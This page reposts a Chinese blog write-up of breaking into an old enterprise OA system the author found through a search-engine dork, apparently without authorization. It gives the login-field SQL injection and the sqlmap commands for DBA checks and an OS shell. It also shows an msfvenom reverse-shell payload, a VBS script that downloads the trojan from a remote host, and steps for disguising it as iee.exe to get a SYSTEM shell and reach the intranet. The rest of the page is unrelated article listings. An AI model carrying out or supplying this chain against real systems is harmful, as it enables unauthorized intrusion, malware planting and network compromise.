服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

某OA系统SYSTEM权限SQL注入

日期: 来源:潇湘信安收集编辑:Woojay
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


0x01 发现漏洞

七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统


IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入


在用户名里输入admin’,不负期望地报了错


很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。

0x02 漏洞验证

打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。

问题参数为 txtLogin=admin%27,可将整个请求复制到 test.txt,使用sqlmap -r 来注入

sqlmap -u http://x.x.x.x/xx.aspx --forms

至此,可以确认存在error-based、stack quires和time-based三个类型的漏洞


0x03 判断数据库用户的权限

发现SQL注入后,首先要判断权限,高权限的注入可以为后续渗透省下很大功夫
sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba


非常nice,再次不负期望地返回了DBA权限,输入以下命令,获得一个shell

sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell


NT/SYSTEM权限,时隔两个多月,复现有误,不予贴图

0x04 反弹shell 深入内网

生成一个shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe

由于环境艰难,不能直接上传文件,我选择了用vbs脚本来下载木马到服务器


代码如下:

Set post=CreateObject("Msxml2.XMLHTTP")post.Open "GET","http://x.x.x.x/shell.exe"'发送请求post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()'等待3秒,等文件下载wscript.sleep 3000 aGet.Write(post.responseBody)'写数据aGet.SaveToFile "shell.exe",2


用echo命令缓慢地写完了vbs脚本之后,顺利运行,下载了木马


更改名字,移动到IE安装目录进行伪装


start iee.exe 运行木马,metasploit成功收到了SYSTEM权限的shell


该主机拥有内网IP,存在内网,可以互通,并且该主机作为中央数据库


此内网主机皆为VMware虚拟机


0x05 结束测试,提交漏洞

本次渗透测试成功拿到最高权限, 到此为止,不再深入。
随着攻击与防御技术的彼此攀升,程序员的安全意识逐渐提高,SQL也越来越少。

但不少粗糙的程序和古老的系统仍然存在此漏洞,此类漏洞解决方法简单,只用对用户输入参数稍加处理即可。

文章来源:Woojay's Blog原文地址:https://blog.blankshell.com/2019/09/12/某oa系统从system权限命令执行到漫游内网漫游内网/


关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读





相关阅读

  • 每周安全动态精选(3.6-3.10)

  • 本周精选Microsoft Word远程代码执行漏洞Mustang Panda 的最新后门利用 Qt 和 MQTT 开辟了新天地宏碁数据泄露:黑客声称出售 160GB 的被盗数据微软发现 Shein App 在 Android
  • tql!逆向/编程/应急工具箱 v1.3

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。Windows平台上的开源Ark工
  • 周六19点直播预告 | AFL系列闭源fuzz技术-2

  • 点击上方按钮预约直播*声明:本场为【付费直播】二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危
  • 干货 | 6款漏扫工具来了(附工具下载链接)

  • 请点击上面  一键关注! 渗透测试收集信息完成后,就要根据所收集的信息,扫描目标站点可能存在的漏洞了,包括我们之前提到过的如:SQL注入漏洞、跨站脚本漏洞、文件上传漏洞、
  • Github渗透测试工具库

  • 目录前言漏洞练习平台花式扫描器信息搜索工具WEBwindows域渗透工具FUZZ漏洞利用及攻击框架中间人攻击及钓鱼密码破解二进制及代码分析工具EXP编写框架及工具隐写各类安全资
  • 实战撸进内网服务器 (Bypass)

  • 文章来源:先知社区(我想学安全)原文地址:https://xz.aliyun.com/t/8083如有侵权,请联系删除0x01 前言本次教程较为基础,打码比较严重,有很多不足的地方,希望各位大佬能够指正。目标
  • 哔哩哔哩大数据平台建设之路—数据安全篇

  • 本期作者李昌海哔哩哔哩资深开发工程师韩志华大数据平台工具负责人1.序言Berserker是B站一站式数据开发及治理平台,基于常用大数据生态组件构建,满足公司内数据查询、数据分析
  • 装了这个App,手机的广告全都消失了

  • 机哥福利活动第一波,星标抽奖送手机活动今天开奖啦。3月5日【星标好机友】抽奖活动,大奖得主已经诞生。中奖的号码为:7r4epv恭喜这位 2020 年开始关注机哥的机友,获得机哥送出 i
  • RequestTemplate红队内网渗透工具

  • RequestTemplate是一款两端并用的红队渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。客户端使用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱
  • 盒子3月女神季,SRC开启春日浪漫

  • 做为新时代的完美女神女安服更是NB~她们写得了代码,挖得了漏洞代码敲的响当当,漏洞挖的当当响!3月8号女神节到了作为一名安服仔,你以为这种节日就没你什么事了?天真!!你为你重要的

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 某OA系统SYSTEM权限SQL注入

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 每周安全动态精选(3.6-3.10)

  • 本周精选Microsoft Word远程代码执行漏洞Mustang Panda 的最新后门利用 Qt 和 MQTT 开辟了新天地宏碁数据泄露:黑客声称出售 160GB 的被盗数据微软发现 Shein App 在 Android
  • 一款高颜值的MySQL管理工具:Sequel Pro

  • Sequel Pro 是一个 Mac 系统上简单易用的 MySQL 和 MariaDB 数据库管理系统。服务器和本地都是Mysql数据库使用的工具:Sequel Pro(专门管理Mysql的工具)操作系统Mac OS 10.12
  • 跑赢

  • 周四和大家分享了自己迭代、简化后的投资思路:在美股,跟上普标 500在 A 股,跟上偏股基金指数/偏股混合基金指数在 A 股公募基金也能获得不错、甚至高于美股的收益。也分享了对
  • 真正厉害的人,从不在舒适区混日子

  • 作者 | 帆书 · 遇见小媛主播 | 帆书 · 童童网上有句话:“生容易,活容易,生活不容易。”生活中,很多人习惯于一边待在舒适圈,一边又感慨人生实苦。概言之,能力配不上野心,有梦又不
  • Android渗透测试HTTPS证书校验绕过

  • 日常Android渗透过程中,会经常遇见https证书校验(http就不存在证书校验了,直接抓包便可),不能抓取数据包。APP是HTTPS的服务提供方自己开发的客户端,开发者可以先将自己服务器的证